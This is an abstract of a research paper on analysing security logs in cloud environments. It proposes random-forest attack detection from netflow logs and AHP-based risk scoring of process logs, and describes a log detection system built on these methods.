Research On Security Logs Analysis Based On Cloud Environment

The cloud platforms with data sharing capability greatly improve the efficiency of data transmission,provide a lot of convenience for our life,and also greatly improve the collaborative interaction between different industries.However,with the development and popularization of technology,new cyber security threats also arise.Although the traditional cyber security experience can also be applied for cloud security,However,considering the current difficulties in cloud environment management and responsibility division,the cloud environment is still facing security attacks and threats from networks,hosts,programs and data.Log files are complete records of the operation of a device or system.Almost all attacks can be recorded in the log files.Considering that "massive flow rate" is an important feature of cyber security attacks in cloud environment,almost all DDo S attacks with peak traffic exceeding 300 G come from the cloud,netflow logs are important references for the detection of network attacks.However,the netflow logs can only prove the occurrence of the attack behavior,and they cannot reflect the progress of the attack.As a complete record of the host’s internal environment,the process logs can measure the impact of the attack behavior.Therefore,this paper focuses on the detection of attack behaviours and the analysis of attack process for netflow and process logs respectively.(1)This paper proposes an attack behaviour detection method based on netflow logs:Considering the difficulties of detection inefficiency caused by large scale of netflow logs in cloud environment and the difference in log structure,this paper first compares and analyzes the contents of four existing netflow data sets to find measures which are common or easily derived.By analyzing some common attack netflows using the above measures,the interaction frequency calculation method based on netflow quad is proposed.The random forest model in machine learning method is used to realize attack detection.These algorithms have low complexity and high implementation efficiency,and can be realized only by relying on the most common quad,packet and byte statistics.Through the test of CICIDS2017 data set,this method can achieve more than 95% accuracy and recall rate for the vast majority of attacks in the data set,which is equivalent to the detection effect of the original measure of the data set,while improving the training detection efficiency,and therefore can realize the detection of common attack behaviours.(2)This paper proposes an attack process analysis method based on process logs: To solve the problems of insufficient accuracy of simple machine learning methods,limited dependence of deep learning framework on environment and the failure of a single log to reflect the complete attack process,this paper proposes risk scoring method based on Hierarchical Analysis and a data association method based on the relationship of process derivation.This paper first uses MAEC technical documents to classify common attack behavior characteristics.Then the risk scoring method of process log is realized through Analytic Hierarchy Process.Finally,data association is realized based on the relationship of process derivation.This method can be implemented by relying only on the most common information like process path,command line,and timestamp information.Through the detection of the actual attacks in cloud environment and the log data collected after simulated attacks,the precision rate of the above method is 83% and the recall rate is 97%.Compared with the deep learning method,the detection effect and efficiency are improved,and therefore common attack process detection and analysis can be realized.(3)Based on the above algorithm,this paper designs a security log detection system in cloud environment,and realizes the functions of common attack detection and the output of corresponding log with the help of this system.This paper gives the overall framework and implementation details of the system,especially the configuration file module.At the same time,a result aggregation algorithm is proposed in the result output module to relieve the difficulty of subsequent manual analysis and the pressure of storage space.